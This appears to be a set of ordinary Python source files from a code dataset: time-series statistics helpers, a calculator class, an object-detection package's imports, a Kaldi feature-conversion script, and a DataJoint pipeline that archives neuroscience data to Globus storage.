zeroPara=dict(hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(days=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='day',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def month(self,ratio: Union[int, float]=None,base: int=30) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. 
Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(months=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='month',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def season(self,ratio: Union[int, float]=None,base: int=3) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. 
{ time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' ''' Spring: March, April, May <br> Summer: June, July, August <br> Autumn: September, October, November <br> Winter: December, January, February ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), zeroPara=dict(day=1,hour=0,minute=0,second=0,microsecond=0), outputPara_list=self.config['outputPara_list'],storageForward=self.config['storageForward'], starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(season=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='season',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def year(self,ratio:Union[int, float]=None,base:int=12) -> Union[None, tuple, list, dict]: ''' Do statistic method base on config setting. Arguments: ratio: require of the data numbers(int) or ratio(float) base: base number of required data, use on ratio<=1 Returns: structure of return data None: if config.selfUpdate==True, then export data by self.get() tuple or list: if config.selfUpdate==False & config.asDict==False, then return the data as tuple. ( time, data, count ) dict: if config.selfUpdate==False & config.asDict==True, then return the data as dictionary. { time: np.ndarray, data: np.ndarray, count: np.ndarray } ''' if ratio!=None: ratio=int(base*ratio) if ratio<=1 else int(ratio) else: if self.ratio!=None: ratio=int(base*self.ratio) if self.ratio<=1 else int(self.ratio) if self.config['fixTime']: if self.config['zeroStart']: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), zeroPara=dict(month=1,day=1,hour=0,minute=0,second=0,microsecond=0),storageForward=self.config['storageForward'], outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: tummy,dummy,count = self._fixTime(self.time,self.data,timeStep=dict(years=1), outputPara_list=self.config['outputPara_list'],starttime=self.starttime,endtime=self.endtime) else: # self.config['fixTime']==False tummy,dummy,count = self._nofixTime(self.time,self.data,parameter='year',outputPara_list=self.config['outputPara_list']) dummy = self._QC_numbers(dummy,count,ratio) if self.config['selfUpdate']: self.data = np.array(dummy) self.time = np.array(tummy) self.counts = np.array(count) else: print("This is not object standard operation!") print("You need to set config[selfUpdate]=True and use get method to get the result.") dummy = Time._set_header(dummy,header=self.header) if self.config['asDict']: return dict(time=tummy,data=dummy,counts=count) else: return tummy,dummy,count def get(self,parameter: str=None) -> Union[list, dict, np.ndarray]: ''' export the data from Time factory. 
Arguments: parameter: select the return parameter. enum: None: { time, data, counts }, config, time, data, counts Returns: select parameter data set. ''' if parameter=='config': return self.config if (parameter==None) and (self.config['asDict']): return dict(time=self.time, data=Time._set_header(self.data,header=self.header), counts=self.counts) if parameter=='time': return self.time if parameter=='data': return Time._set_header(self.data,header=self.header) if parameter=='counts': return self.counts print("Please select the return parameter or set config['asDict']=True.") if __name__ == "__main__": # Implement the object myobj = Time() # Input data import datetime, random st = datetime.datetime(2020,1,1) number = 50000 time = [st+datetime.timedelta(hours=val) for val in range(number)] data = [[random.gauss(10,5) for _ in range(4)] for _ in range(number)] myobj.input(time,data,header=['a','b','c','d']) # Calculate and Get result # myobj.hour(1,500) myobj.set_config(outputPara_list=['mean','std','max','quartile']) myobj.season() myobj.set_config(asDict=True) result = myobj.get() print(result)
595
0
106
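The `Time` helper above bins a timestamped array into calendar intervals (second/minute/hour/day/month/season/year) and returns the statistics selected in `config['outputPara_list']`. A minimal usage sketch in addition to the built-in `__main__` demo, using synthetic hourly data; the column names are illustrative and the `Time` class defined above is assumed to already be in scope:

```python
import datetime
import random

# Synthetic input: 30 days of hourly samples with two measurement columns.
start = datetime.datetime(2021, 1, 1)
time = [start + datetime.timedelta(hours=h) for h in range(24 * 30)]
data = [[random.gauss(10, 5) for _ in range(2)] for _ in range(len(time))]

obj = Time()                                       # Time class from the module above
obj.input(time, data, header=['pm25', 'pm10'])     # header labels the two columns

# Ask for daily mean/std and a dict-shaped result, as described in set_config().
obj.set_config(outputPara_list=['mean', 'std'], asDict=True)
obj.day()

result = obj.get()   # {'time': ..., 'data': {'mean': {'pm25': ...}, ...}, 'counts': ...}
print(result['time'][:3])
print(result['data']['mean']['pm25'][:3])
print(result['counts'][:3])
```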
3d40cc9af82e7caa1ec12b7d4fdc7c7db383ac10
701
py
Python
Ago-Dic-2021/diaz-delabra-erick/carpeta-practica-3/calculator.py
AnhellO/DAS_Sistemas
07b4eca78357d02d225d570033d05748d91383e3
[ "MIT" ]
41
2017-09-26T09:36:32.000Z
2022-03-19T18:05:25.000Z
Ago-Dic-2021/diaz-delabra-erick/carpeta-practica-3/calculator.py
AnhellO/DAS_Sistemas
07b4eca78357d02d225d570033d05748d91383e3
[ "MIT" ]
67
2017-09-11T05:06:12.000Z
2022-02-14T04:44:04.000Z
Ago-Dic-2021/diaz-delabra-erick/carpeta-practica-3/calculator.py
AnhellO/DAS_Sistemas
07b4eca78357d02d225d570033d05748d91383e3
[ "MIT" ]
210
2017-09-01T00:10:08.000Z
2022-03-19T18:05:12.000Z
import math
24.172414
50
0.510699
import math

from typing import Union


class Calculator:
    def __init__(self, a: int, b: int) -> None:
        self.a = a
        self.b = b

    def suma(self) -> int:
        return self.a + self.b

    def resta(self) -> int:
        return self.a - self.b

    def multiplicacion(self) -> int:
        return self.a * self.b

    def division(self) -> Union[float, str]:
        if self.b == 0:
            return "No se puede dividir entre 0"
        return self.a / self.b

    def raizNumero(self) -> Union[float, str]:
        # raíz b-ésima de a; se rechazan bases negativas e índice 0
        if self.a < 0:
            return "No se puede raiz de negativos"
        if self.b == 0:
            return "No se puede raiz con indice 0"
        return pow(self.a, 1 / self.b)

    def potencia(self) -> float:
        return pow(self.a, self.b)
476
-4
218
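A short usage sketch for the `Calculator` class above (the operand values are arbitrary):

```python
calc = Calculator(8, 2)
print(calc.suma())                   # 10
print(calc.resta())                  # 6
print(calc.division())               # 4.0
print(calc.raizNumero())             # 2.828..., i.e. 8 ** (1/2)
print(Calculator(5, 0).division())   # "No se puede dividir entre 0"
```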
f191d89902854c6a45383db6b705fc612cf47791
784
py
Python
mmdet/models/__init__.py
FelixZhang7/miemiedetection
ca44f33255e0bb9d6150044983a344fb9a288c08
[ "Apache-2.0" ]
null
null
null
mmdet/models/__init__.py
FelixZhang7/miemiedetection
ca44f33255e0bb9d6150044983a344fb9a288c08
[ "Apache-2.0" ]
null
null
null
mmdet/models/__init__.py
FelixZhang7/miemiedetection
ca44f33255e0bb9d6150044983a344fb9a288c08
[ "Apache-2.0" ]
1
2022-02-16T08:35:00.000Z
2022-02-16T08:35:00.000Z
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
from .backbones.darknet import CSPDarknet, Darknet
from .backbones.resnet_vd import Resnet18Vd, Resnet50Vd
from .backbones.resnet_vb import Resnet50Vb
from .losses.yolov3_loss import YOLOv3Loss
from .losses.losses import IOUloss
from .losses.iou_losses import MyIOUloss, IouLoss, IouAwareLoss
from .losses.fcos_loss import FCOSLoss
from .heads.yolov3_head import YOLOv3Head
from .heads.yolox_head import YOLOXHead
from .heads.fcos_head import FCOSHead
from .necks.yolo_pafpn import YOLOPAFPN
from .necks.yolo_fpn import YOLOFPN
from .necks.fpn import FPN
from .architectures.yolo import PPYOLO
from .architectures.yolox import YOLOX
from .architectures.fcos import FCOS
27.034483
63
0.811224
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
from .backbones.darknet import CSPDarknet, Darknet
from .backbones.resnet_vd import Resnet18Vd, Resnet50Vd
from .backbones.resnet_vb import Resnet50Vb
from .losses.yolov3_loss import YOLOv3Loss
from .losses.losses import IOUloss
from .losses.iou_losses import MyIOUloss, IouLoss, IouAwareLoss
from .losses.fcos_loss import FCOSLoss
from .heads.yolov3_head import YOLOv3Head
from .heads.yolox_head import YOLOXHead
from .heads.fcos_head import FCOSHead
from .necks.yolo_pafpn import YOLOPAFPN
from .necks.yolo_fpn import YOLOFPN
from .necks.fpn import FPN
from .architectures.yolo import PPYOLO
from .architectures.yolox import YOLOX
from .architectures.fcos import FCOS
0
0
0
0468d6c246b239a4fae46a385cc87c22edb5790e
282
py
Python
egs/voxceleb/v2.voxceleb1/scp_ark2npy.py
zeek-han/kaldi
e3ed0812db7abd3c266d5616babfd0adff8260ac
[ "Apache-2.0" ]
null
null
null
egs/voxceleb/v2.voxceleb1/scp_ark2npy.py
zeek-han/kaldi
e3ed0812db7abd3c266d5616babfd0adff8260ac
[ "Apache-2.0" ]
null
null
null
egs/voxceleb/v2.voxceleb1/scp_ark2npy.py
zeek-han/kaldi
e3ed0812db7abd3c266d5616babfd0adff8260ac
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python

import numpy as np
import kaldiio

id2mfcc = kaldiio.load_scp('/home/sangjik/kaldi/egs/voxceleb/v2.smallest/mfcc/raw_mfcc_train.10.scp')

for utt_id, mfcc in id2mfcc.items():
    #print(utt_id, mfcc.shape)
    np.save('./tmp_mfcc/{}.npy'.format(utt_id), mfcc)
28.2
101
0.72695
#!/usr/bin/env python

import numpy as np
import kaldiio

id2mfcc = kaldiio.load_scp('/home/sangjik/kaldi/egs/voxceleb/v2.smallest/mfcc/raw_mfcc_train.10.scp')

for utt_id, mfcc in id2mfcc.items():
    #print(utt_id, mfcc.shape)
    np.save('./tmp_mfcc/{}.npy'.format(utt_id), mfcc)
0
0
0
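The script above dumps every feature matrix referenced by a Kaldi `.scp` index to a `.npy` file. A slightly more reusable sketch of the same idea, with the hard-coded paths turned into command-line arguments (the argument names are illustrative):

```python
#!/usr/bin/env python
import argparse
from pathlib import Path

import kaldiio
import numpy as np

parser = argparse.ArgumentParser(
    description="Dump features referenced by a Kaldi .scp file to per-utterance .npy files")
parser.add_argument("scp", help="path to the .scp index, e.g. mfcc/raw_mfcc_train.10.scp")
parser.add_argument("out_dir", help="directory that receives one .npy file per utterance")
args = parser.parse_args()

out_dir = Path(args.out_dir)
out_dir.mkdir(parents=True, exist_ok=True)

# kaldiio.load_scp returns a lazy, dict-like reader: utterance id -> feature matrix.
for utt_id, feats in kaldiio.load_scp(args.scp).items():
    np.save(out_dir / "{}.npy".format(utt_id), feats)
```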
b75db27a80b0122a92a95241b891c75aed56b87b
38,348
py
Python
pipeline/publication.py
Yi-61/map-ephys
8eacd84f67678b05bcc379c7d5a9560ea7a87e46
[ "MIT" ]
null
null
null
pipeline/publication.py
Yi-61/map-ephys
8eacd84f67678b05bcc379c7d5a9560ea7a87e46
[ "MIT" ]
null
null
null
pipeline/publication.py
Yi-61/map-ephys
8eacd84f67678b05bcc379c7d5a9560ea7a87e46
[ "MIT" ]
null
null
null
import logging import pathlib import re import os from fnmatch import fnmatch from textwrap import dedent from collections import defaultdict import datajoint as dj from . import lab from . import experiment from . import ephys from . import tracking from .ingest.tracking import TrackingIngest from pipeline.globus import GlobusStorageManager from . import get_schema_name PUBLICATION_TRANSFER_TIMEOUT = 10000 schema = dj.schema(get_schema_name('publication')) log = logging.getLogger(__name__) __all__ = [experiment, ephys] @schema class GlobusStorageLocation(dj.Lookup): """ globus storage locations """ definition = """ globus_alias: varchar(32) # name for location (e.g. 'raw-ephys') --- globus_endpoint: varchar(255) # globus endpoint (user#endpoint) globus_path: varchar(1024) # unix-style path within endpoint """ @property @classmethod def local_endpoint(cls, globus_alias=None): ''' return local endpoint for globus_alias from dj.config expects: globus.local_endpoints: { globus_alias: { 'endpoint': uuid, # UUID of local endpoint 'endpoint_subdir': str, # unix-style path within endpoint 'endpoint_path': str # corresponding local path } ''' le = dj.config.get('custom', {}).get('globus.local_endpoints', None) if le is None or globus_alias not in le: raise dj.DataJointError( "globus_local_endpoints for {} not configured".format( globus_alias)) return le[globus_alias] @schema @schema @schema @schema @schema @schema @schema class ArchivedTrackingVideo(dj.Imported): ''' ArchivedTrackingVideo storage Note: video_file_name tracked here as trial->file map is non-deterministic Directory locations of the form: {Water restriction number}\{Session Date}\video with file naming convention of the form: {Water restriction number}_{camera-position-string}_NNN-NNNN.avi Where 'NNN' is determined from the 'tracking map file' which maps trials to videos as outlined in tracking.py XXX: Using key-source based loookup as is currently done, may have trials for which there is no tracking, so camera cannot be determined to do file lookup, thus videos are missed. This could be resolved via schema adjustment, or file-traversal based 'opportunistic' registration strategy. 
''' definition = """ -> ArchivedSession -> tracking.TrackingDevice --- -> DataSet """ key_source = tracking.TrackingDevice * experiment.Session ingest = None # ingest module reference gsm = None # for GlobusStorageManager @classmethod def get_ingest(cls): ''' return tracking_ingest module not imported globally to prevent ingest schema creation for client case ''' log.debug('ArchivedVideoFile.get_ingest()') if cls.ingest is None: from .ingest import tracking as tracking_ingest cls.ingest = tracking_ingest return cls.ingest @classmethod def discover(cls): """ discover files on globus and attempt to register them """ self = cls() globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) ra, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() smap = {'{}/{}'.format(s['water_restriction_number'], s['session_date']).replace('-', ''): s for s in (experiment.Session() * (lab.WaterRestriction() * lab.Subject.proj()))} tpos_dev = {s['tracking_position']: s['tracking_device'] for s in tracking.TrackingDevice()} # position:device ftmap = {t['file_type']: t for t in (FileType() & "file_type like 'tracking%%'")} skey = None sskip = set() sfiles = [] # {file_subpath:, trial:, file_type:,} gsm = self.get_gsm() gsm.activate_endpoint(lep) gsm.activate_endpoint(rep) for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): vdir = re.match('([a-z]+[0-9]+)/([0-9]{8})/video', dirname) if not vdir or node['DATA_TYPE'] != 'file': continue h2o, sdate = vdir[1], vdir[2] skey_i = '{}/{}'.format(h2o, sdate) if skey_i != skey: if skey and skey in smap: with dj.conn().transaction: try: commit(skey, sfiles) except Exception as e: log.error( 'Exception {} committing {}. files: {}'.format( repr(e), skey, sfiles)) skey, sfiles = skey_i, [] if skey not in smap: if skey not in sskip: log.debug('session {} not known. skipping'.format(skey)) sskip.add(skey) continue fname = node['name'] log.debug('checking {}/{}'.format(dirname, fname)) if '.' not in fname: log.debug('skipping {} - no dot in fname'.format(fname)) continue froot, fext = fname.split('.', 1) ftype = {g['file_type']: g for g in ftmap.values() if fnmatch(fname, g['file_glob'])} if len(ftype) != 1: log.debug('skipping {} - incorrect type matches: {}'.format( fname, ftype)) continue ftype = next(iter(ftype.values()))['file_type'] log.debug('processing as {}'.format(ftype)) file_subpath = '{}/{}'.format(dirname, fname) if ftype == 'tracking-video-map': # e.g. dl55_20190108_side.txt h2o_f, fdate, pos = froot.split('_') sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'file_subpath': file_subpath, 'file_type': ftype}) else: # tracking-video-map # e.g. 
dl41_side_998-0000.avi or dl41_side_998-0000_00.avi h2o_f, pos, video = froot.replace('-', '_').split('_')[:3] sfiles.append({'water_restriction_number': h2o, 'session_date': '{}-{}-{}'.format( sdate[:4], sdate[4:6], sdate[6:]), 'position': pos, 'video': int(video), 'file_subpath': file_subpath, 'file_type': ftype}) def make(self, key): """ discover files in local endpoint and transfer/register """ log.info('ArchivedVideoFile.make(): {}'.format(key)) # {'tracking_device': 'Camera 0', 'subject_id': 432572, 'session': 1} globus_alias = 'raw-video' le = GlobusStorageLocation.local_endpoint(globus_alias) lep, lep_sub, lep_dir = (le['endpoint'], le['endpoint_subdir'], le['endpoint_path']) re = (GlobusStorageLocation & {'globus_alias': globus_alias}).fetch1() rep, rep_sub = re['globus_endpoint'], re['globus_path'] log.info('local_endpoint: {}:{} -> {}'.format(lep, lep_sub, lep_dir)) log.info('remote_endpoint: {}:{}'.format(rep, rep_sub)) h2o = (lab.WaterRestriction & key).fetch1('water_restriction_number') session = (experiment.Session & key).fetch1() sdate = session['session_date'] sdate_sml = "{}{:02d}{:02d}".format(sdate.year, sdate.month, sdate.day) dev = (tracking.TrackingDevice & key).fetch1() trls = (experiment.SessionTrial & key).fetch( order_by='trial', as_dict=True) tracking_ingest = self.get_ingest() tdev = dev['tracking_device'] # NOQA: notused tpos = dev['tracking_position'] camtrial = '{}_{}_{}.txt'.format(h2o, sdate_sml, tpos) vbase = pathlib.Path(lep_dir, h2o, sdate_sml, 'video') campath = vbase / camtrial if not campath.exists(): # XXX: uses 1st found log.warning('trial map {} n/a! skipping.'.format(campath)) return log.info('loading trial map: {}'.format(campath)) vmap = {v: k for k, v in tracking_ingest.TrackingIngest.load_campath(campath).items()} log.debug('loaded video map: {}'.format(vmap)) # add ArchivedSession as_key = {k: v for k, v in key.items() if k in experiment.Session.primary_key} as_rec = {**as_key, 'globus_alias': globus_alias} ArchivedSession.insert1(as_rec, allow_direct_insert=True, skip_duplicates=True) # add DataSet ds_type = 'tracking-video' ds_name = '{}_{}_{}_{}'.format(h2o, sdate.isoformat(), ds_type, tpos) ds_key = {'globus_alias': globus_alias, 'dataset_name': ds_name} ds_rec = {**ds_key, 'dataset_type': ds_type} DataSet.insert1(ds_rec, allow_direct_insert=True) # add ArchivedVideoTracking vt_key = {**as_key, 'tracking_device': tdev} vt_rec = {**vt_key, 'globus_alias': globus_alias, 'dataset_name': ds_name} self.insert1(vt_rec) filetype = 'tracking-video-trial' for t in trls: trial = t['trial'] log.info('.. tracking trial {} ({})'.format(trial, t)) if t['trial'] not in vmap: log.warning('trial {} not in video map. skipping!'.format(t)) continue vmatch = '{}_{}_{}-*'.format(h2o, tpos, vmap[trial]) log.debug('vbase: {}, vmatch: {}'.format(vbase, vmatch)) vglob = list(vbase.glob(vmatch)) if len(vglob) != 1: emsg = 'incorrect videos found in {}: {}'.format(vbase, vglob) log.warning(emsg) raise dj.DataJointError(emsg) vfile = vglob[0].name gfile = '{}/{}/{}/{}'.format( h2o, sdate_sml, 'video', vfile) # subpath srcp = '{}:{}/{}'.format(lep, lep_sub, gfile) # source path dstp = '{}:{}/{}'.format(rep, rep_sub, gfile) # dest path gsm = self.get_gsm() gsm.activate_endpoint(lep) # XXX: cache / prevent duplicate RPC? gsm.activate_endpoint(rep) # XXX: cache / prevent duplicate RPC? 
log.info('transferring {} to {}'.format(srcp, dstp)) if not gsm.cp(srcp, dstp): emsg = "couldn't transfer {} to {}".format(srcp, dstp) log.error(emsg) raise dj.DataJointError(emsg) pf_key = {**ds_key, 'file_subpath': vfile} pf_rec = {**pf_key, 'file_type': filetype} DataSet.PhysicalFile.insert1({**pf_rec}, allow_direct_insert=True) trk_key = {k: v for k, v in {**key, 'trial': trial}.items() if k in experiment.SessionTrial.primary_key} tv_rec = {**vt_key, **trk_key, **pf_key} self.TrialVideo.insert1({**tv_rec}) def test_flist(fname='globus-index-full.txt'): ''' spoof tester for discover methods expects: f: ep:/path/to/file d: ep:/path/to/direct etc. (aka: globus-shell 'find' output) replace the line: for ep, dirname, node in gsm.fts('{}:{}'.format(rep, rep_sub)): with: for ep, dirname, node in test_flist('globus-list.txt'): to test against the file 'globus-list.txt' ''' with open(fname, 'r') as infile: for l in infile: try: t, fp = l.split(' ') fp = fp.split(':')[1].lstrip('/').rstrip('\n') dn, bn = os.path.split(fp) if t == 'f:': yield ('ep', dn, {'DATA_TYPE': 'file', 'name': bn}) else: yield ('ep', dn, {'DATA_TYPE': 'dunno', 'path': bn}) except ValueError as e: if 'too many values' in repr(e): pass
34.861818
80
0.49854
import logging import pathlib import re import os from fnmatch import fnmatch from textwrap import dedent from collections import defaultdict import datajoint as dj from . import lab from . import experiment from . import ephys from . import tracking from .ingest.tracking import TrackingIngest from pipeline.globus import GlobusStorageManager from . import get_schema_name PUBLICATION_TRANSFER_TIMEOUT = 10000 schema = dj.schema(get_schema_name('publication')) log = logging.getLogger(__name__) __all__ = [experiment, ephys] @schema class GlobusStorageLocation(dj.Lookup): """ globus storage locations """ definition = """ globus_alias: varchar(32) # name for location (e.g. 'raw-ephys') --- globus_endpoint: varchar(255) # globus endpoint (user#endpoint) globus_path: varchar(1024) # unix-style path within endpoint """ @property def contents(self): custom = dj.config.get('custom', None) if custom and 'globus.storage_locations' in custom: # test config return custom['globus.storage_locations'] return (('raw-ephys', '5b875fda-4185-11e8-bb52-0ac6873fc732', '/'), ('raw-video', '5b875fda-4185-11e8-bb52-0ac6873fc732', '/'),) @classmethod def local_endpoint(cls, globus_alias=None): ''' return local endpoint for globus_alias from dj.config expects: globus.local_endpoints: { globus_alias: { 'endpoint': uuid, # UUID of local endpoint 'endpoint_subdir': str, # unix-style path within endpoint 'endpoint_path': str # corresponding local path } ''' le = dj.config.get('custom', {}).get('globus.local_endpoints', None) if le is None or globus_alias not in le: raise dj.DataJointError( "globus_local_endpoints for {} not configured".format( globus_alias)) return le[globus_alias] @schema class ArchivedSession(dj.Imported): definition = """ -> experiment.Session --- -> GlobusStorageLocation """ @schema class DataSetType(dj.Lookup): definition = """ dataset_type: varchar(64) """ contents = zip(['ephys-raw-trialized', 'ephys-raw-continuous', 'ephys-sorted', 'tracking-video']) @schema class FileType(dj.Lookup): definition = """ file_type: varchar(32) # file type short name --- file_glob: varchar(64) # file match pattern file_descr: varchar(255) # file type long description """ @property def contents(self): data = [('ephys-raw-3a-ap-trial', '*_g0_t[0-9]*.imec.ap.bin', ''' 3A Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - recording file '''), ('ephys-raw-3a-ap-trial-meta', '*_g0_t[0-9]*.imec.ap.meta', ''' 3A Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - file metadata '''), ('ephys-raw-3a-lf-trial', '*_g0_t[0-9]*.imec.lf.bin', ''' 3A Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - recording file '''), ('ephys-raw-3a-lf-trial-meta', '*_g0_t[0-9]*.imec.lf.meta', ''' 3A Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - file metadata '''), ('ephys-raw-3b-ap-trial', '*_????????_g?_t[0-9]*.imec.ap.bin', ''' 3B Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - recording file '''), ('ephys-raw-3b-ap-trial-meta', '*_????????_g?_t[0-9]*.imec.ap.meta', ''' 3B Probe per-trial AP channels high pass filtered at 300Hz and sampled at 30kHz - file metadata '''), ('ephys-raw-3b-lf-trial', '*_????????_g?_t[0-9]*.imec.lf.bin', ''' 3B Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - recording file '''), ('ephys-raw-3b-lf-trial-meta', '*_????????_g?_t[0-9]*.imec.lf.meta', ''' 3B Probe per-trial AP channels low pass filtered at 300Hz and sampled at 2.5kHz - file 
metadata '''), ('ephys-raw-3b-ap-concat', '*_????????_g?_tcat.imec.ap.bin', ''' 3B Probe concatenated AP channels high pass filtered at 300Hz and sampled at 30kHz - recording file '''), ('ephys-raw-3b-ap-concat-meta', '*_??????_g?_tcat.imec.ap.meta', ''' 3B Probe concatenated AP channels high pass filtered at 300Hz and sampled at 30kHz - file metadata '''), ('ephys-raw-3b-lf-concat', '*_????????_g?_tcat.imec.lf.bin', ''' 3B Probe concatenated AP channels low pass filtered at 300Hz and sampled at 2.5kHz - recording file '''), ('ephys-raw-3b-lf-concat-meta', '*_????????_g?_tcat.imec.lf.meta', ''' 3B Probe concatenated AP channels low pass filtered at 300Hz and sampled at 2.5kHz - file metadata '''), ('tracking-video-trial', '*_*_[0-9]*-*.[am][vp][i4]', ''' Video Tracking per-trial file at 300fps '''), ('tracking-video-map', '*_????????_*.txt', ''' Video Tracking file-to-trial mapping ''')] return [[dedent(i).replace('\n', ' ').strip(' ') for i in r] for r in data] @schema class DataSet(dj.Manual): definition = """ -> GlobusStorageLocation dataset_name: varchar(128) --- -> DataSetType """ class PhysicalFile(dj.Part): definition = """ -> master file_subpath: varchar(128) --- -> FileType """ @schema class ArchivedRawEphys(dj.Imported): definition = """ -> ArchivedSession -> DataSet probe_folder: tinyint """ key_source = experiment.Session gsm = None # for GlobusStorageManager class RawEphysTrial(dj.Part): """ file:trial mapping if applicable """ definition = """ -> master -> experiment.SessionTrial -> DataSet.PhysicalFile """ def get_gsm(self): log.debug('ArchivedRawEphysTrial.get_gsm()') if self.gsm is None: self.gsm = GlobusStorageManager() self.gsm.wait_timeout = PUBLICATION_TRANSFER_TIMEOUT return self.gsm @classmethod def discover(cls): """ Discover files on globus and attempt to register them. """ self = cls() globus_alias = 'raw-ephys' ra, rep, rep_sub = (GlobusStorageLocation() & {'globus_alias': globus_alias}).fetch1().values() smap = {'{}/{}'.format(s['water_restriction_number'], s['session_date']).replace('-', ''): s for s in (experiment.Session() * (lab.WaterRestriction() * lab.Subject.proj()))} ftmap = {t['file_type']: t for t in (FileType() & "file_type like 'ephys%%'")} skey = None sskip = set() sfiles = [] # {file_subpath:, trial:, file_type:,} def commit(skey, sfiles): log.info('commit. skey: {}, sfiles: {}'.format(skey, sfiles)) if not sfiles: log.info('skipping. no files in set') return h2o, sdate, ftypes = set(), set(), set() ptmap = defaultdict(lambda: defaultdict(list)) # probe:trial:file for s in sfiles: ptmap[s['probe']][s['trial']].append(s) h2o.add(s['water_restriction_number']) sdate.add(s['session_date']) ftypes.add(s['file_type']) if len(h2o) != 1 or len(sdate) != 1: log.info('skipping. bad h2o {} or session date {}'.format( h2o, sdate)) return h2o, sdate = next(iter(h2o)), next(iter(sdate)) {k: {kk: vv for kk, vv in v.items()} for k, v in ptmap.items()} if all('trial' in f for f in ftypes): # DataSet ds_type = 'ephys-raw-trialized' ds_name = '{}_{}_{}'.format(h2o, sdate, ds_type) ds_key = {'dataset_name': ds_name, 'globus_alias': globus_alias} if (DataSet & ds_key): log.info('DataSet: {} already exists. 
